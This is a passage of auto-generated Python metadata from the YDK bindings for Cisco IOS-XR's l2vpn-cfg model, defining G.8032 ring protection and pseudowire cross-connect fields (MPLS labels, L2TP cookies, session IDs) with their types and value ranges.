'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
False,
[
_MetaInfoClassMember('aps-channel', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port1 APS channel in the format of
InterfaceName, BDName or XconnectName
''',
'aps_channel',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('aps-type', REFERENCE_ENUM_CLASS, 'ErpapsEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpapsEnum',
[], [],
''' Port1 APS type
''',
'aps_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable automatic protection switching
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('level', ATTRIBUTE, 'int' , None, None,
[('0', '7')], [],
''' Automatic protection switching level
''',
'level',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port0', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port0 APS channel in the format of
InterfaceName
''',
'port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port1', REFERENCE_CLASS, 'Port1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
[], [],
''' APS channel for ERP port1
''',
'port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'aps',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
False,
[
_MetaInfoClassMember('erp-instance-id', ATTRIBUTE, 'int' , None, None,
[('1', '2')], [],
''' ERP instance number
''',
'erp_instance_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('aps', REFERENCE_CLASS, 'Aps' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
[], [],
''' Automatic protection switching
''',
'aps',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('description', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance
description
''',
'description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('inclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Associates a set of VLAN IDs with the G
.8032 instance
''',
'inclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance profile
''',
'profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('rpl', REFERENCE_CLASS, 'Rpl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
[], [],
''' Ring protection link
''',
'rpl',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
False,
[
_MetaInfoClassMember('erp-instance', REFERENCE_LIST, 'ErpInstance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
[], [],
''' Ethernet ring protection instance
''',
'erp_instance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instances',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
False,
[
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'none',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port1 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'virtual-or-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
False,
[
_MetaInfoClassMember('erp-port-type', REFERENCE_ENUM_CLASS, 'ErpPortEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPortEnum',
[], [],
''' Port1 type
''',
'erp_port_type',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('none', REFERENCE_CLASS, 'None_' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
[], [],
''' none
''',
'none',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('virtual-or-interface', REFERENCE_LIST, 'VirtualOrInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
[], [],
''' virtual or interface
''',
'virtual_or_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
False,
[
_MetaInfoClassMember('erp-port1', REFERENCE_LIST, 'ErpPort1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
[], [],
''' Ethernet ring protection port1
''',
'erp_port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring',
False,
[
_MetaInfoClassMember('g8032-ring-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the G8032 ring
''',
'g8032_ring_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('erp-instances', REFERENCE_CLASS, 'ErpInstances' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
[], [],
''' List of ethernet ring protection instance
''',
'erp_instances',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port0s', REFERENCE_CLASS, 'ErpPort0S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port0s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port1s', REFERENCE_CLASS, 'ErpPort1S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port1s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-provider-bridge', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ethernet ring protection provider bridge
''',
'erp_provider_bridge',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('exclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Vlan IDs in the format of a-b,c,d,e-f,g
,untagged
''',
'exclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('open-ring', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Specify the G.8032 instance as open ring
''',
'open_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-ring',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings',
False,
[
_MetaInfoClassMember('g8032-ring', REFERENCE_LIST, 'G8032Ring' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring',
[], [],
''' G8032 Ring
''',
'g8032_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-rings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
False,
[
_MetaInfoClassMember('backup-attachment-circuit', REFERENCE_LIST, 'BackupAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
[], [],
''' Backup attachment circuit
''',
'backup_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Remote AC ID
''',
'remote_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('source-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Source AC ID
''',
'source_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
False,
[
_MetaInfoClassMember('pseudowire-evpn', REFERENCE_LIST, 'PseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
[], [],
''' EVPN P2P Service Configuration
''',
'pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
